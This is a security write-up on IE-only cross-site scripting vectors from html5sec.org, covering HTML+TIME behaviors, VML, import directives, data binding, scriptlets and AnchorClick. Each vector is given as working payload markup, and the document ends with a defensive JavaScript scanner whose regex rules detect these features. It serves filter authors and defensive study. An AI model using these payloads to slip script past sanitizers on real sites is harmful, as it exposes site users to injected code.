Notes and observations on a few vectors seen on html5sec.org. They are IE-only, but worth recording.

1. TIME animate: attributename combined with values
<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
<t:animate style="behavior:url(#default#time2)" attributename="innerhtml"
  values="&lt;img/src=&quot;.&quot;style=&quot;display:none&quot;onerror=eval(myxss.title)&gt;"></t:animate>
</div>
</body>
</html>

The img markup inside values has its angle brackets and inner quotes entity-encoded so that it stays inside one double-quoted attribute; the browser decodes it before the time2 behavior assigns it to innerHTML, the image fails to load, and onerror evaluates the script kept in the title attribute of #myxss. The same thing used directly on the element, with an unquoted values attribute:
<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
2. TIME onbegin. This one is of limited use: any filter that already strips on* attributes stops it.

<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >

The attribute values are quoted with backticks, which legacy IE accepts as attribute delimiters; the time2 behavior fires onbegin as soon as the element's timeline starts, with no user interaction.

3. TIME set: attributename combined with to
<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml`
  to=`<img/src="x"onerror=alert(1)>`>
</div>
</body>
</html>

Same idea as 1, but with the set element, which assigns the value once, and backtick-quoted attributes; the mixed-case behAvior shows the style property name is matched case-insensitively.

4. VML: triggering via onmouseover
<html xmlns:t="urn:schemas-microsoft-com:time">
<body>
<div title="alert(1);" id="myxss">xxx</div>
<div>
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100%
  src=test.vml#xss></vmlframe>
</div>
</body>
</html>

The referenced test.vml:

<xml>
<rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" />
</xml>

The vmlframe is positioned to cover the whole page and the rect in the external VML file fills the frame, so almost any mouse movement over the page fires onmouseover.

5. A different route to TIME: html/xml + import combination
<html>
<body>
<div>
<div id="x">x</div>
<?xml:namespace prefix="t">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror=alert(1)>">
</div>
</body>
</html>

The processing-instruction form is not required; the same thing without the "?" on xml:namespace and import also works:

<html>
<body>
<div>
<div id="x">x</div>
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror=alert(1)>">
</div>
</body>
</html>

Or the html + import combination, declaring the prefix on the html element and only importing the implementation:

<html xmlns:t>
<body>
<div>
<div id="x">x</div>
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror=alert(1)>">
</div>
</body>
</html>

6. xml + htc combination
<html>
<body>
<div>
<xml id="xss" src="test.htc"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>
</div>
</body>
</html>

The test.htc file (plain XML loaded as a data island; the .htc extension is incidental):

<?xml version="1.0"?>
<x>
<payload><![CDATA[<img src=x onerror=alert(1)>]]></payload>
</x>

dataformatas="html" makes IE data binding render the bound field as markup instead of text, so the CDATA payload is written into the label as HTML.

7. style + scriptlet combination

The scriptlet file, test.sct. The page does not show the host markup; per the heading, the scriptlet is pulled in through a style attribute's behavior:url() pointing at the .sct file, the same mechanism the #default# behaviors above use:

<SCRIPTLET>
<IMPLEMENTS Type="Behavior"></IMPLEMENTS>
<SCRIPT Language="javascript">alert(1)</SCRIPT>
</SCRIPTLET>

8. AnchorClick + folder (requires clicking the link)
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
Summary: behavior is really dangerous. import is dangerous too, both inside style and as a tag, whether written <import ...> or <?import ...>. All of these depend on legacy IE features (HTML+TIME, VML, DHTML behaviors, data binding) that only work in older IE or in legacy document modes, but the lesson for filter authors is general: stripping script tags and on* handlers is not enough, and behavior:url(), #default# behaviors, the urn:schemas-microsoft-com namespaces, import, and dataformatas=html need handling as well.
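As an added example, not code from html5sec.org or from the original post, here is a small JavaScript scanner that flags the markup features the vectors above depend on. The rule names and the constructed sample strings are this example's own; it decodes HTML entities first so an entity-encoded payload like the values attribute in item 1 is seen in decoded form, and it is a heuristic pre-filter aid, not a replacement for a real HTML sanitizer.

```javascript
// Added example (not from html5sec.org or the original post): flag the IE-only
// markup features the vectors above rely on. A heuristic pre-filter aid, not a
// parser; rule names and the constructed samples below are this example's own.

const RULES = [
  { name: 'behavior-style',    re: /behavior\s*:\s*url\s*\(/i },             // style="behavior:url(...)"
  { name: 'time2-behavior',    re: /#default#time2\b/i },                    // HTML+TIME built-in behavior
  { name: 'vml-behavior',      re: /#default#vml\b/i },                      // VML built-in behavior
  { name: 'anchorclick',       re: /#default#anchorclick\b/i },              // AnchorClick behavior
  { name: 'time-namespace',    re: /urn:schemas-microsoft-com:time/i },
  { name: 'vml-namespace',     re: /urn:schemas-microsoft-com:vml/i },
  { name: 'import-pi',         re: /<\??import\b[^>]*implementation\s*=/i },  // <?import ...> or <import ...>
  { name: 'xml-namespace-pi',  re: /<\??xml:namespace\b/i },
  { name: 'animate-innerhtml', re: /attributename\s*=\s*["'`]?innerhtml\b/i }, // t:animate / t:set on innerHTML
  { name: 'time-onbegin',      re: /\bonbegin\s*=/i },
  { name: 'data-binding-html', re: /dataformatas\s*=\s*["'`]?html\b/i },     // bound data rendered as markup
  { name: 'behavior-file',     re: /\.(?:htc|sct)\b/i },                     // external behavior / scriptlet file
  { name: 'folder-js',         re: /\bfolder\s*=\s*["'`]?\s*javascript:/i },
];

// Convert a code point to a string, dropping out-of-range values instead of throwing.
function cp(n) {
  return n <= 0x10ffff ? String.fromCodePoint(n) : '';
}

// Decode numeric and the common named entities. Runs a bounded number of
// passes so a doubly-encoded payload (&amp;lt;...) is also seen decoded.
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', quot: '"', amp: '&', apos: "'" };
  let prev;
  for (let i = 0; i < 3 && s !== prev; i++) {
    prev = s;
    s = s
      .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
      .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
      .replace(/&(lt|gt|quot|amp|apos);?/gi, (_, n) => named[n.toLowerCase()]);
  }
  return s;
}

// Return the names of every rule that matches the (decoded) markup, in RULES order.
function findIeLegacyVectors(html) {
  const text = decodeEntities(String(html));
  return RULES.filter((r) => r.re.test(text)).map((r) => r.name);
}

// Constructed samples mirroring the vectors above, plus one benign fragment.
const SAMPLES = {
  timeAnimate: '<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>',
  timeOnbegin: '<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >',
  importPi: '<?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="&lt;img src=x:x onerror=alert(1)&gt;">',
  htcBinding: '<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>',
  anchorClick: '<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>',
  benign: '<p class="note">Plain <b>text</b> with <a href="https://example.test/">a link</a></p>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(12), findIeLegacyVectors(html).join(', ') || '(clean)');
}
```

The regexes deliberately allow whitespace around "=" and ":" and accept backticks as well as normal quotes, because the vectors above show IE tolerating all of those; a filter that only matches the canonical spelling misses them.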